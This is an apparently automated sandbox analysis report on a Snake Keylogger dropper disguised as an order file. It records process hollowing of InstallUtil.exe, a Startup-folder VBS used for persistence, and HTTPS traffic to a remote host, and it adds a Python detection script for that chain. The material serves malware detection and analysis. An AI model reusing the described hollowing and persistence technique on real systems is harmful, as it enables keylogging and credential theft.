Source: NEW FRANCE ORDER.exe, 00000000.00000002.1290556972.0000000003401000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1523800985.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 0000000B.00000002.2423370342.00000000030EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: InstallUtil.exe, 00000007.00000002.2422846155.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.00000000030EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/4
Source: InstallUtil.exe, 00000007.00000002.2422846155.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2423370342.00000000030E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: InstallUtil.exe PID: 1600, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: initial sample Static PE information: Filename: NEW FRANCE ORDER.exe
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_05DDA0B8 NtProtectVirtualMemory, 0_2_05DDA0B8
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_05DDD3A0 NtResumeThread, 0_2_05DDD3A0
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_05DDA0B2 NtProtectVirtualMemory, 0_2_05DDA0B2
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_05DDD398 NtResumeThread, 0_2_05DDD398
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05908AA8 NtProtectVirtualMemory, 10_2_05908AA8
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_0590C260 NtResumeThread, 10_2_0590C260
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05908AA1 NtProtectVirtualMemory, 10_2_05908AA1
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_0590C25B NtResumeThread, 10_2_0590C25B
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLakqypwuugy.exe8 vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1300438282.00000000061F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameYgwwafygojh.dll" vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1290556972.0000000003631000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1303196281.00000000066C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1290556972.0000000003401000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000000.1169932223.000000000100E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameLakqypwuugy.exe8 vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1289695539.00000000016DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.00000000046E4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe Binary or memory string: OriginalFilenameLakqypwuugy.exe8 vs NEW FRANCE ORDER.exe
Source: NEW FRANCE ORDER.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: InstallUtil.exe PID: 1600, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: NEW FRANCE ORDER.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: IsSingleByte.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NEW FRANCE ORDER.exe, -.cs Cryptographic APIs: 'TransformFinalBlock' (3 entries)
Source: IsSingleByte.exe.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock' (3 entries)
Source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock' (3 entries)
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@4/4
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsSingleByte.vbs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsSingleByte.vbs"
Source: NEW FRANCE ORDER.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: NEW FRANCE ORDER.exe Virustotal: Detection: 56%
Source: NEW FRANCE ORDER.exe ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe File read: C:\Users\user\Desktop\NEW FRANCE ORDER.exe
Source: unknown Process created: C:\Users\user\Desktop\NEW FRANCE ORDER.exe "C:\Users\user\Desktop\NEW FRANCE ORDER.exe"
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsSingleByte.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\IsSingleByte.exe "C:\Users\user\AppData\Roaming\IsSingleByte.exe"
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
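The five "Process created" rows above are the whole infection chain: the dropper starts an argument-less InstallUtil.exe (the signed .NET binary it hollows), wscript.exe runs the .vbs from the Startup folder at logon, that script relaunches the copy in AppData\Roaming, and the copy hollows InstallUtil.exe again. The following detection logic is an added example written for this page, not part of the Joe Sandbox report; it parses the rows exactly as printed above and flags the three links. The rule names and the list of .NET hollowing hosts are the example's own choices.

```python
"""Reconstruct the process chain from the "Process created" rows above and flag the
three links that turn a .NET dropper into a persistent keylogger install."""
import re
from pathlib import PureWindowsPath

# The five rows copied from the report (parent, child, child command line).
REPORT_ROWS = [
    r'Source: unknown Process created: C:\Users\user\Desktop\NEW FRANCE ORDER.exe "C:\Users\user\Desktop\NEW FRANCE ORDER.exe"',
    r'Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"',
    r'Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsSingleByte.vbs"',
    r'Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\IsSingleByte.exe "C:\Users\user\AppData\Roaming\IsSingleByte.exe"',
    r'Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"',
]

ROW = re.compile(r'^Source: (?P<parent>.+?) Process created: (?P<child>.+?\.exe) (?P<cmdline>".*")$')

# Signed .NET utilities that exit quietly when started with no arguments; that makes them
# the usual hosts for the "create suspended, write PE, resume" injection seen in this report.
HOLLOW_HOSTS = {"installutil.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe", "aspnet_compiler.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
STARTUP_DIR = "\\start menu\\programs\\startup\\"


def parse_rows(rows):
    """Turn each report row into (parent path, child path, child command line)."""
    procs = []
    for row in rows:
        m = ROW.match(row)
        if not m:
            raise ValueError(f"unrecognised row: {row!r}")
        procs.append((m["parent"], m["child"], m["cmdline"]))
    return procs


def basename(path):
    return PureWindowsPath(path).name.lower()


def user_writable(path):
    return path.lower().startswith("c:\\users\\")


def analyze(rows):
    """Return (rule, parent image, child image) for every row matching one of the three links."""
    findings = []
    for parent, child, cmdline in parse_rows(rows):
        pname, cname, cmd = basename(parent), basename(child), cmdline.lower()
        # 1. A binary living under C:\Users starts a .NET LOLBin with an empty command line.
        if cname in HOLLOW_HOSTS and cmd == f'"{child.lower()}"' and user_writable(parent):
            findings.append(("dotnet_lolbin_no_args", pname, cname))
        # 2. The script host is told to run a script that lives in the Startup folder.
        if cname in SCRIPT_HOSTS and STARTUP_DIR in cmd:
            findings.append(("script_from_startup_folder", pname, cname))
        # 3. That script host then launches an executable out of AppData\Roaming.
        if pname in SCRIPT_HOSTS and "\\appdata\\roaming\\" in child.lower():
            findings.append(("script_host_spawns_appdata_exe", pname, cname))
    return findings


def chain(rows):
    """Parent -> child edges by image name, in report order, for a quick tree view."""
    return [f"{basename(p)} -> {basename(c)}" for p, c, _ in parse_rows(rows)]


if __name__ == "__main__":
    print("\n".join(chain(REPORT_ROWS)))
    for rule, parent, child in analyze(REPORT_ROWS):
        print(f"[{rule}] {parent} -> {child}")
```

Rule 1 fires twice here (once per hollowed InstallUtil.exe), which is the strongest signal: a legitimate InstallUtil.exe run always carries an assembly path on its command line, so an empty one launched from a user profile directory has no benign explanation. Rules 2 and 3 together describe the logon persistence; either alone also matches scripts that users drop into Startup themselves, so score them lower.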
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Sections loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Sections loaded (in order): mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, wtsapi32.dll, winsta.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, edputil.dll
Source: C:\Windows\System32\wscript.exe Sections loaded (in order): version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Sections loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll
